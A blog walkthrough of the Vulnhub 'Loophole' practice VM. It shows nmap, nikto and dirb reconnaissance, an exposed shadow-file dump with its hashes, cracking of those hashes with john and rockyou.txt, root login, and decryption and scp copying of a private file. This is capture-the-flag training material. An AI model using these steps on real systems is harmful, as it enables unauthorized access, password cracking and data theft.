Vulnhub - Loophole vm
After configuring the network settings on each vm, we scan the network to detect the IP address of the 'server':
- the 'netdiscover' command will show up IP addresses discovered on the configured network. In our case 10.8.7.2/29 was our IP address for the 'server' and for our Kali box it was 10.8.7.4/29 (as the first IP address available on the network).
Note: I had to create a VMnet3 network (under the Virtual Network Editor) , assign it the IP address network of 10.8.7.0/29. I configured my VM workstation's IP address under VMnet3 and ran 'netdiscover'.
The 'server':
root@kali:~# nmap -sT -p- -T4 10.8.7.2
Nmap scan report for 10.8.7.2
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
113/tcp open ident
139/tcp open netbios-ssn
445/tcp open microsoft-ds
I also wanted to scan for UDP ports, so I ran the command above modified accordingly...but it was going to take forever, so I stopped it!
Upon checking what's running on port 80, we find out, based on the email addresses, some potential usernames, we can use to brute force: tskies@rattus.lab, jsummer@rattus.lab, mhog@rattus.lab.
Respectively:
tskies
jsummer
mhog
More testing of port 80 with nikto and dirbuster:
Nikto:
root@kali:~# nikto -h http://10.8.7.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.8.7.2
+ Target Hostname: 10.8.7.2
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/1.3.31 (Unix) PHP/4.4.4
+ Server leaks inodes via ETags, header found with file /, inode: 20914, size: 3001, mtime: Fri Feb 18 03:33:59 2011
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ PHP/4.4.4 appears to be outdated (current is at least 5.4.26)
+ Apache/1.3.31 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'CONNECT' may allow server to proxy client requests.
+ HTTP method: 'PATCH' may allow client to issue patch commands to server. See RFC-5789.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/4.4.4
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7355 requests: 0 error(s) and 22 item(s) reported on remote host
---------------------------------------------------------------------------
+ 1 host(s) tested
Dirbuster:
root@kali:~# dirb http://10.8.7.2
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://10.8.7.2/ ----
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37710)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)
+ http://10.8.7.2/~operator (CODE:403|SIZE:275)
+ http://10.8.7.2/~root (CODE:403|SIZE:271)
-----------------
DOWNLOADED: 4592 - FOUND: 9
Browsing the found directories, we stumble upon this:
http://10.8.7.2/garbage
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
Attempting to crack the MD5 hashed passwords online....no luck!
We will try j0hn, the password cracker, with the famous rockyou.txt password file...
root@kali:~/Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt loophole
Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
nostradamus (tskies)
albatros (root)
We logon as root, to see if it's possible... and it is! :)
We browse through the /home directories and find an .enc encrypted file.
Maybe the .bash_history file will provide us with some clues... and it does...
Below is the command used to encrypted the file:
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
We reverse the encryption, to see if we can view the file:
openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
And we download onto our Kali box the Private.doc file:
root@kali:~/Desktop# scp root@10.8.7.2:/root/Private.doc /root/Desktop/
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the system you must use valid credentials.
===========================================================
root@10.8.7.2's password:
Private.doc 100%
It seems to be some engineering documentation!
The end ....
0 comments:
Post a Comment